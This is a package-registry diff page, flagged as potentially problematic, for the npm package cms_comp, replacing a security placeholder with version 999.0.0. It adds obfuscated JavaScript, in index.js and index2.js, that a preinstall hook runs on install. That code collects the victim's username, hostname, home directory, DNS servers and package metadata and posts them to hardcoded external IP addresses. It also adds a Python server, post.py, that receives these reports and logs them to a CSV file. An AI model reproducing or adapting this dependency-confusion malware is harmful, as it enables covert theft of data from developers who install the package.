cms_comp 0.0.1-security → 999.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cms_comp might be problematic. Click here for more details.
- package/index.js +54 -0
- package/index2.js +53 -0
- package/package.json +8 -3
- package/post.py +73 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
const a1 = require(String.fromCharCode(111, 115));
|
|
2
|
+
const b1 = require(String.fromCharCode(100, 110, 115));
|
|
3
|
+
const c1 = require(String.fromCharCode(113, 117, 101, 114, 121, 115, 116, 114, 105, 110, 103));
|
|
4
|
+
const d1 = require(String.fromCharCode(104, 116, 116, 112));
|
|
5
|
+
const e1 = require("./package.json");
|
|
6
|
+
const f1 = e1.name;
|
|
7
|
+
|
|
8
|
+
const g1 = JSON.stringify({
|
|
9
|
+
p: f1,
|
|
10
|
+
c: __dirname,
|
|
11
|
+
hd: a1.homedir(),
|
|
12
|
+
hn: a1.hostname(),
|
|
13
|
+
un: a1.userInfo().username,
|
|
14
|
+
dns: b1.getServers(),
|
|
15
|
+
r: e1 ? e1.___resolved : undefined,
|
|
16
|
+
v: e1.version,
|
|
17
|
+
pjson: e1,
|
|
18
|
+
});
|
|
19
|
+
|
|
20
|
+
var h1 = c1.stringify({
|
|
21
|
+
msg: g1,
|
|
22
|
+
});
|
|
23
|
+
|
|
24
|
+
var i1 = {
|
|
25
|
+
hostname: String.fromCharCode(52, 51, 46, 49, 51, 54, 46, 51, 53, 46, 50, 49, 51),
|
|
26
|
+
port: 445,
|
|
27
|
+
path: String.fromCharCode(47),
|
|
28
|
+
method: String.fromCharCode(80, 79, 83, 84),
|
|
29
|
+
headers: {
|
|
30
|
+
"Content-Type": String.fromCharCode(97, 112, 112, 108, 105, 99, 97, 116, 105, 111, 110, 47, 120, 45, 119, 119, 119, 45, 102, 111, 114, 109, 45, 117, 114, 108, 101, 110, 99, 111, 100, 101, 100), // "application/x-www-form-urlencoded"
|
|
31
|
+
"Content-Length": h1.length,
|
|
32
|
+
},
|
|
33
|
+
};
|
|
34
|
+
|
|
35
|
+
var j1 = d1.request(i1, (k1) => {
|
|
36
|
+
k1.on("data", (l1) => {
|
|
37
|
+
process.stdout.write(l1);
|
|
38
|
+
});
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
j1.on("error", (m1) => {
|
|
42
|
+
if(Math.random() > 0.5) {
|
|
43
|
+
var n1 = true;
|
|
44
|
+
while(n1) {
|
|
45
|
+
n1 = false;
|
|
46
|
+
}
|
|
47
|
+
} else {
|
|
48
|
+
// handle error
|
|
49
|
+
}
|
|
50
|
+
});
|
|
51
|
+
|
|
52
|
+
j1.write(h1);
|
|
53
|
+
j1.end();
|
|
54
|
+
console.log("The script is running!");
|
package/index2.js
ADDED
|
@@ -0,0 +1,53 @@
|
|
|
1
|
+
const a1 = require(String.fromCharCode(111, 115));
|
|
2
|
+
const b1 = require(String.fromCharCode(100, 110, 115));
|
|
3
|
+
const c1 = require(String.fromCharCode(113, 117, 101, 114, 121, 115, 116, 114, 105, 110, 103));
|
|
4
|
+
const d1 = require(String.fromCharCode(104, 116, 116, 112));
|
|
5
|
+
const e1 = require("./package.json");
|
|
6
|
+
const f1 = e1.name;
|
|
7
|
+
|
|
8
|
+
const g1 = JSON.stringify({
|
|
9
|
+
p: f1,
|
|
10
|
+
c: __dirname,
|
|
11
|
+
hd: a1.homedir(),
|
|
12
|
+
hn: a1.hostname(),
|
|
13
|
+
un: a1.userInfo().username,
|
|
14
|
+
dns: b1.getServers(),
|
|
15
|
+
r: e1 ? e1.___resolved : undefined,
|
|
16
|
+
v: e1.version,
|
|
17
|
+
pjson: e1,
|
|
18
|
+
});
|
|
19
|
+
|
|
20
|
+
var h1 = c1.stringify({
|
|
21
|
+
msg: g1,
|
|
22
|
+
});
|
|
23
|
+
|
|
24
|
+
var i1 = {
|
|
25
|
+
hostname: String.fromCharCode(51,56,46,49,54,53,46,50,49,46,50,48),
|
|
26
|
+
port: 8089,
|
|
27
|
+
path: String.fromCharCode(47),
|
|
28
|
+
method: String.fromCharCode(80,79,83,84),
|
|
29
|
+
headers: {
|
|
30
|
+
"Content-Type": String.fromCharCode(97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100),
|
|
31
|
+
"Content-Length": h1.length,
|
|
32
|
+
},
|
|
33
|
+
};
|
|
34
|
+
|
|
35
|
+
var j1 = d1.request(i1, (k1) => {
|
|
36
|
+
k1.on("data", (l1) => {
|
|
37
|
+
process.stdout.write(l1);
|
|
38
|
+
});
|
|
39
|
+
});
|
|
40
|
+
|
|
41
|
+
j1.on("error", (m1) => {
|
|
42
|
+
if (Math.random() > 0.5) {
|
|
43
|
+
var n1 = true;
|
|
44
|
+
while (n1) {
|
|
45
|
+
n1 = false;
|
|
46
|
+
}
|
|
47
|
+
} else {
|
|
48
|
+
// handle error
|
|
49
|
+
}
|
|
50
|
+
});
|
|
51
|
+
|
|
52
|
+
j1.write(h1);
|
|
53
|
+
j1.end();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "cms_comp",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "999.0.0",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "wanggang",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/post.py
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
import http.server
|
|
2
|
+
import socketserver
|
|
3
|
+
import json
|
|
4
|
+
import csv
|
|
5
|
+
from urllib.parse import unquote
|
|
6
|
+
import sys
|
|
7
|
+
|
|
8
|
+
# 从命令行参数中获取端口号,默认值为80
|
|
9
|
+
PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
|
|
10
|
+
FILENAME = 'log.csv'
|
|
11
|
+
|
|
12
|
+
class CustomHandler(http.server.BaseHTTPRequestHandler):
|
|
13
|
+
def do_POST(self):
|
|
14
|
+
content_length = int(self.headers['Content-Length'])
|
|
15
|
+
post_data = self.rfile.read(content_length).decode('utf-8')
|
|
16
|
+
|
|
17
|
+
print(f"Raw POST data: {post_data}") # 调试信息,打印收到的原始数据
|
|
18
|
+
|
|
19
|
+
try:
|
|
20
|
+
# 解析POST请求中的数据
|
|
21
|
+
data = self.parse_post_data(post_data)
|
|
22
|
+
|
|
23
|
+
# 把数据追加到CSV文件中
|
|
24
|
+
self.write_to_csv(data)
|
|
25
|
+
|
|
26
|
+
# 返回200响应
|
|
27
|
+
self.send_response(200)
|
|
28
|
+
self.end_headers()
|
|
29
|
+
self.wfile.write(b'POST request received')
|
|
30
|
+
except Exception as e:
|
|
31
|
+
self.send_response(400) # 发送400错误,表示请求体解析失败
|
|
32
|
+
self.end_headers()
|
|
33
|
+
self.wfile.write(f"Error processing POST data: {e}".encode('utf-8'))
|
|
34
|
+
|
|
35
|
+
def parse_post_data(self, post_data):
|
|
36
|
+
# 解码并解析 msg 参数的值
|
|
37
|
+
try:
|
|
38
|
+
parsed_data = unquote(post_data.split('msg=')[1])
|
|
39
|
+
json_data = json.loads(parsed_data)
|
|
40
|
+
except (IndexError, json.JSONDecodeError) as e:
|
|
41
|
+
raise ValueError(f"Error parsing post data: {e}")
|
|
42
|
+
|
|
43
|
+
return {
|
|
44
|
+
'PackageName': json_data.get('p'), # 修改列名
|
|
45
|
+
'Path': json_data.get('c'), # 修改列名
|
|
46
|
+
'homePath': json_data.get('hd'), # 修改列名
|
|
47
|
+
'hostname': json_data.get('hn'), # 修改列名
|
|
48
|
+
'User': json_data.get('un'), # 修改列名
|
|
49
|
+
'dns': json_data['dns'][0] if 'dns' in json_data else '',
|
|
50
|
+
'ip': json_data['dns'][1] if 'dns' in json_data and len(json_data['dns']) > 1 else '',
|
|
51
|
+
}
|
|
52
|
+
|
|
53
|
+
def write_to_csv(self, data):
|
|
54
|
+
file_exists = False
|
|
55
|
+
try:
|
|
56
|
+
with open(FILENAME, 'r') as f:
|
|
57
|
+
file_exists = True
|
|
58
|
+
except FileNotFoundError:
|
|
59
|
+
pass
|
|
60
|
+
|
|
61
|
+
with open(FILENAME, 'a', newline='') as csvfile:
|
|
62
|
+
fieldnames = ['PackageName', 'Path', 'homePath', 'hostname', 'User', 'dns', 'ip'] # 更新列名
|
|
63
|
+
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
|
|
64
|
+
|
|
65
|
+
if not file_exists:
|
|
66
|
+
writer.writeheader() # 如果文件不存在,写入表头
|
|
67
|
+
|
|
68
|
+
writer.writerow(data)
|
|
69
|
+
|
|
70
|
+
if __name__ == "__main__":
|
|
71
|
+
with socketserver.TCPServer(("", PORT), CustomHandler) as httpd:
|
|
72
|
+
print(f"Serving on port {PORT}")
|
|
73
|
+
httpd.serve_forever()
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=cms_comp for more information.
|